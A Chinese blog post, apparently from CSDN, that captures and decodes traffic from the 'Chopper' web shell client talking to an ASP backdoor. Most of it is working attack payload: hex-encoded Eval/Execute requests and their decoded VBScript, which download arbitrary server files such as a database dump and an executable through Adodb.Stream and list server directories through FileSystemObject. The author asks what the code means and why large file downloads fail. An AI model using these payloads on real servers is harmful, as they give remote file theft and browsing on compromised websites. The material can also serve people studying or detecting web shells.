菜刀ASP 下载文件抓包

http://blog.csdn.net/webxscan     神龙


打开文件


Send: Return Code: 0x00000000
webxscan=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D20692C632C723A53657420533D5365727665722E4372656174654F626A656374282241646F64622E53747265616D22293A4966204E6F7420457272205468656E3A5769746820533A2E4D6F64653D333A2E547970653D313A2E

4F70656E3A2E4C6F616446726F6D46696C65285265717565737428227A312229293A693D303A633D2E53697A653A723D313032343A5768696C6520693C633A526573706F6E73652E42696E6172795772697465202E526561642872293A526

573706F6E73652E466C7573683A693D692B723A57656E643A2E436C6F73653A53657420533D4E6F7468696E673A456E6420576974683A456C73653A526573706F6E73652E42696E617279577269746520224552524F523A2F2F2022264572

722E4465736372697074696F6E3A456E64204966"""")):Response.Write(""""|<-""""):Response.End"")")&z1=C%3A%5C%5CDocuments+and+Settings%5C%5Ca%5C%5C%D7%C0%C3%E6%5C%5Cwww%5C%5C.%5C%5Cweb.sql

Dim i,c,r
Set S=Server.CreateObject("Adodb.Stream")
If Not Err Then:With S
.Mode=3
.Type=1
.Open
.LoadFromFile(Request("z1"))
i=0
c=.Size
r=1024
While i<c
Response.BinaryWrite .Read(r)
Response.Flush
i=i+r
Wend
.Close
Set S=Nothing
End With
Else
Response.BinaryWrite "ERROR:// "&Err.Description
End If



这段ASP啥意思啊  感觉应该是遍历路径  但是和上次抓到的结果不一样啊
webxscan=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D204644

262230223A456E642049663A46443D4644264D6F6E74682864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D6

1744461746554696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A53

455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C646572282222265252262222293A496620457272205468656E3A526573706F6

E73652E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E57726974

6520462E4E616D6526636872283437292663687228392926464428462E446174654C6173744D6F646966696564292663687228392926636872283438292663687228392926432E476574466F6C64657228462E50617468292E61747472696

27574657326636872283130293A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F646966696564292663

6872283929264C2E73697A652663687228392926432E47657446696C65284C2E50617468292E6174747269627574657326636872283130293A4E6578743A456E64204966"""")):Response.Write(""""|<-""""):Response.End"")")

&z1=413A5C5C
A:\\


Dim RR
RR=bd(Request("z1"))
Function FD(dt)
FD=Year(dt)&"-"
If Len(Month(dt))=1 Then
FD = FD&"0"
End If
FD=FD&Month(dt)&"-"
If Len(Day(dt))=1 Then
FD=FD&"0"
End If
FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":"
If Len(Second(dt))=1 Then
FD=FD&"0"
End If
FD=FD&Second(dt)
End Function
SET C=CreateObject("Scripting.FileSystemObject")
Set FO=C.GetFolder(""&RR&"")
If Err Then
Response.Write("ERROR:// "&Err.Description)
Err.Clear
Else
For Each F in FO.subfolders
Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10)
Next
For Each L in FO.files
Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10)
Next
End If


->|ERROR:// 路径未找到|<-

下载文件  大型文件   奇怪为什么我在下载压缩包之类的文件就不行了呢
webxscan=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D20692C632C723A53657420533D5365727665722E4372656174654F626A656374282241646F64622E53747265616D22293A4966204E6F7420457272205468656E3A5769746820533A2E4D6F64653D333A2E547970653D313A2E

4F70656E3A2E4C6F616446726F6D46696C65285265717565737428227A312229293A693D303A633D2E53697A653A723D313032343A5768696C6520693C633A526573706F6E73652E42696E6172795772697465202E526561642872293A526

573706F6E73652E466C7573683A693D692B723A57656E643A2E436C6F73653A53657420533D4E6F7468696E673A456E6420576974683A456C73653A526573706F6E73652E42696E617279577269746520224552524F523A2F2F2022264572

722E4465736372697074696F6E3A456E64204966"""")):Response.Write(""""|<-""""):Response.End"")")&z1=C%3A%5C%5CDocuments+and+Settings%5C%5Ca%5C%5C%D7%C0%C3%E6%5C%5Cwww%5C%5C.%5C%5CAws.exe

Dim i,c,r
Set S=Server.CreateObject("Adodb.Stream")
If Not Err Then
With S
.Mode=3
.Type=1
.Open
.LoadFromFile(Request("z1"))
i=0
c=.Size
r=1024
While i<c
Response.BinaryWrite .Read(r)
Response.Flush
i=i+r
Wend
.Close
Set S=Nothing
End With
Else
Response.BinaryWrite "ERROR:// "&Err.Description
End If


































你可能感兴趣的:(菜刀ASP 下载文件抓包)